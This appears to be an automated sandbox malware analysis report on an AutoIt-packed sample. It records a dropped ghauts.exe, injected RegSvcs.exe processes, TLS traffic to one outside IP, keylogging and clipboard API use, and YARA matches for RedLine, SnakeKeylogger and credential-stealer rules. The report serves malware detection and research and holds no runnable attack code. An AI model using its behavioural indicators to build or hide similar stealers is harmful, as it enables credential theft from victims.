                Source: RegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003273000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/Dze
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000032C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/Dzh
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000032BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000327D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBdq
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F54164
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F54164
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00604164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00604164
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F53F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F53F66
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F4001C
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F6CABC
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0061CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0061CABC

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 5.2.ghauts.exe.3dd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.2.ghauts.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: This is a third-party compiled AutoIt script.0_2_00EE3B3A
                Source: 3i1gMM8K4z.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 3i1gMM8K4z.exe, 00000000.00000003.1728649989.00000000037F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_67eb08b2-5
                Source: 3i1gMM8K4z.exe, 00000000.00000003.1728649989.00000000037F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b49f3153-9
                Source: 3i1gMM8K4z.exe, 00000000.00000000.1697676318.0000000000F94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b76cf2a9-3
                Source: 3i1gMM8K4z.exe, 00000000.00000000.1697676318.0000000000F94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5889ef36-8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: This is a third-party compiled AutoIt script.1_2_00593B3A
                Source: ghauts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ghauts.exe, 00000001.00000002.1769654807.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_33a15379-a
                Source: ghauts.exe, 00000001.00000002.1769654807.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9f401820-f
                Source: ghauts.exe, 00000005.00000002.1923948210.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2aa9e3c3-7
                Source: ghauts.exe, 00000005.00000002.1923948210.0000000000644000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9b12784a-7
                Source: 3i1gMM8K4z.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3f0db6fc-b
                Source: 3i1gMM8K4z.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_fb644265-4
                Source: ghauts.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0ff8d753-b
                Source: ghauts.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_968f3c5b-0
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00F4A1EF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F38310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F38310
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F451BD
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005F51BD
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEE6A00_2_00EEE6A0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0D9750_2_00F0D975
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEFCE00_2_00EEFCE0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F021C50_2_00F021C5
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F162D20_2_00F162D2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F603DA0_2_00F603DA
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F1242E0_2_00F1242E
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F025FA0_2_00F025FA
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF66E10_2_00EF66E1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F3E6160_2_00F3E616
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F1878F0_2_00F1878F
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F488890_2_00F48889
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F608570_2_00F60857
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F168440_2_00F16844
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF88080_2_00EF8808
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0CB210_2_00F0CB21
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F16DB60_2_00F16DB6
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF6F9E0_2_00EF6F9E
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF30300_2_00EF3030
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0F1D90_2_00F0F1D9
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F031870_2_00F03187
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE12870_2_00EE1287
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F014840_2_00F01484
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF55200_2_00EF5520
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F076960_2_00F07696
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF57600_2_00EF5760
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F019780_2_00F01978
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F19AB50_2_00F19AB5
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F67DDB0_2_00F67DDB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0BDA60_2_00F0BDA6
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F01D900_2_00F01D90
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EF3FE00_2_00EF3FE0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EEDF000_2_00EEDF00
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_014429D80_2_014429D8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059E6A01_2_0059E6A0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BD9751_2_005BD975
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059FCE01_2_0059FCE0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B21C51_2_005B21C5
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C62D21_2_005C62D2
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_006103DA1_2_006103DA
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C242E1_2_005C242E
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B25FA1_2_005B25FA
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005EE6161_2_005EE616
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A66E11_2_005A66E1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C878F1_2_005C878F
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C68441_2_005C6844
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_006108571_2_00610857
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A88081_2_005A8808
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F88891_2_005F8889
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BCB211_2_005BCB21
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C6DB61_2_005C6DB6
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A6F9E1_2_005A6F9E
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A30301_2_005A3030
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BF1D91_2_005BF1D9
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B31871_2_005B3187
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005912871_2_00591287
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B14841_2_005B1484
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A55201_2_005A5520
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B76961_2_005B7696
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A57601_2_005A5760
